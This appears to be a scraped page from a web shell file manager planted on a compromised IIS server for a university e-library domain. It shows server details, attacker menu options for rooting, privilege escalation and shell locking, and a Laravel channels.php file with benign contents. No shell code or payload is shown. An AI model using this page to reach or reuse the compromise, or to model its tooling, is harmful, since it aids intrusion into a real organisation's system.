Windows NT WIN-F6SLGVICLOP 10.0 build 17763 (Windows Server 2016) AMD64
Microsoft-IIS/10.0
Server IP : & Your IP : 3.148.221.222
Domains :
Cant Read [ /etc/named.conf ]
User : elibrary.unsap.ac.id
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Lock Shell
Lock File++
Readme
D: /
localhost /
formulirkampus /
routes /
Delete
Unzip
Name
Size
Permission
Date
Action
api.php
589
B
-rw-rw-rw-
2024-03-22 15:20
channels.php
576
B
-rw-rw-rw-
2024-03-22 15:20
console.php
611
B
-rw-rw-rw-
2024-03-22 15:20
web.php
1.72
KB
-rw-rw-rw-
2024-03-23 17:09
Save
Rename
<?php use Illuminate\Support\Facades\Broadcast; /* |-------------------------------------------------------------------------- | Broadcast Channels |-------------------------------------------------------------------------- | | Here you may register all of the event broadcasting channels that your | application supports. The given channel authorization callbacks are | used to check if an authenticated user can listen to the channel. | */ Broadcast::channel('App.Models.User.{id}', function ($user, $id) { return (int) $user->id === (int) $id; });